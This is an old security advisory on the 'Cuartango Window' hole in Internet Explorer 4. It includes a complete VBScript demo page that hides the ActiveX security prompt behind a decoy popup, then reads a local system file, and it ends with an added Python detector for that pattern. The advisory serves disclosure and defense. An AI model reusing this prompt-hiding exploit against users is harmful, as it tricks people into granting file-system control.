Cuartango Window - MSIE allows malicious VBScripts to take control of your PC!

Cuartango Window 

http://pages.whowhere.com/computers/cuartangojc/cuartangow1.html

Affected software
Microsoft Internet Explorer 4


Risks
Your computer is at risk: a malicious VBScript can get full control over
your system. The VBScript can do everything: delete files, install
viruses, read your files ...


Technical description
When Microsoft Internet Explorer detects that a Visual Basic Script
included in an HTML page will create an object ("CreateObject" statement)
to access your file system, a security alert dialog is displayed:



Nobody with minimal knowledge of ActiveX and VB Scripts would accept
this dialog. If you click the "yes" button you have given FULL CONTROL of
your machine to the VB Script code.

The vulnerability comes from the fact that it is possible to hide this dialog
box and get FULL CONTROL over the victim machine.

The key idea is very simple: just display a window over the security alert,
hiding the message and replacing it with another friendly message but keeping
the buttons of the original message visible.

I will show you how the malicious script works:

First we open a friendly window (the Cuartango Window):

set wcover = window.open ("welcome.htm", "Welcome . . . )

The next instruction will generate the security alert because we are accessing
the file system; this prompt will be behind the welcome window!!!

Set fs = CreateObject("Scripting.FileSystemObject")

At this moment, instead of the alert shown above, what we see is:





If the YES button is clicked the script has FULL CONTROL. The welcome
window is no longer needed, so we close it:

wcover.close

At this point the script owns the machine. As an example, I will
get the autoexec.bat file and display it in a text box. But the script
could do anything on your machine: delete all your files, install a virus
...

Set myfile = fs.OpenTextFile("c:\config.sys")
content = myfile.readall
myfile.Close
document.form1.s1.value = content


----------exploit code example----------

<html>

<head>
<meta name="description" content="Explorer vulnerability : Cuartango Window hole">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<meta name="keywords"
content="activex security,explorer security hole,explorer vulnerability,cuartango window,cuartango hole,cuartango hack,activex hole,vbscript hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>Cuartango Window demo</title>
</head>

<body bgcolor="#C0C0C0">
<script language="VBScript">

if instr(1,navigator.userAgent,"MSIE") = 0 then 
        msgbox "Please, use Microsoft Internet Explorer",0,"GoodBye"
        window.navigate "http://www.microsoft.com"
end if
if window.screen.width <> 800 then       
        alert "Your screen resolution must be 800 x 600"
        window.navigate "cuartangow1.html"
else   ' coordinates given for 800 x 600
        set wcover = window.open ("welcometrick.html", "Welcome", "top = 190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no, status=no")
        Set fs = CreateObject("Scripting.FileSystemObject")
        wcover.close
        Set myfile = fs.OpenTextFile("c:\config.sys")
        content = myfile.readall
        myfile.Close
end if

</script>


<h1 align="center"><font color="#FF0000">Cuartango Window Demo</font></h1>

<p align="center"><strong>This example shows you how ActiveX could destroy your system.
&nbsp; As an example I have read your config.sys file</strong><br>
Back to <a href="cuartangow1.html">Cuartango Window Page</a></p>

<form method="POST" name="form1">
  <div align="center"><center><p><textarea rows="18" name="S1" cols="49"></textarea></p>
  </center></div>
</form>
<script language="VBScript">

 document.form1.s1.value = content

</script>


<p>&nbsp;</p>
</body>
</html>
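
A defender-side check for the pattern described above, as an added example that is not part of the original advisory: a static heuristic that flags VBScript blocks where a popup is opened, CreateObject is called while that popup is still open, and the popup is then closed. The function name, the regular expressions and the sample pages are assumptions constructed for illustration.

```python
import re

# Added example: static heuristic for the cover-window pattern in this advisory.
# Line-based, so it will miss obfuscated or multi-statement lines.
SCRIPT_RE = re.compile(
    r'<script[^>]*language\s*=\s*["\']?vbscript["\']?[^>]*>(.*?)</script>', re.I | re.S)
OPEN_RE = re.compile(r'^\s*set\s+(\w+)\s*=\s*window\.open\s*\((.*)\)', re.I)
CREATE_RE = re.compile(r'\bCreateObject\s*\(\s*"([^"]+)"', re.I)
CLOSE_RE = re.compile(r'^\s*(\w+)\.close\b', re.I)
POSITION_RE = re.compile(r'\b(?:top|left)\s*=\s*\d+', re.I)

def find_cover_windows(html):
    """Report popups that were open while CreateObject ran and were closed after."""
    findings = []
    for block in SCRIPT_RE.findall(html):
        popups = {}  # popup variable -> state while that popup is open
        for line in block.splitlines():
            m = OPEN_RE.search(line)
            if m:
                popups[m.group(1).lower()] = {
                    "positioned": bool(POSITION_RE.search(m.group(2))),
                    "progids": [],
                }
                continue
            # Any object created now would raise its prompt under an open popup.
            for progid in CREATE_RE.findall(line):
                for state in popups.values():
                    state["progids"].append(progid)
            m = CLOSE_RE.search(line)
            if m:
                state = popups.pop(m.group(1).lower(), None)
                if state and state["progids"]:
                    findings.append({"popup": m.group(1), **state})
    return findings

# Constructed sample pages (hypothetical file names), not taken from a real site.
SAMPLE_COVER = '''<script language="VBScript">
set w = window.open ("cover.html", "Cover", "top = 190,left = 227, height = 80")
Set fs = CreateObject("Scripting.FileSystemObject")
w.close
</script>'''
SAMPLE_BENIGN = '''<script language="VBScript">
set w = window.open ("help.html", "Help", "height = 300, width = 400")
w.close
Set d = CreateObject("Scripting.Dictionary")
</script>'''

if __name__ == "__main__":
    print(find_cover_windows(SAMPLE_COVER), find_cover_windows(SAMPLE_BENIGN))
```

The `positioned` flag separates popups placed at fixed screen coordinates, as in the demo above, from popups opened without explicit placement.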
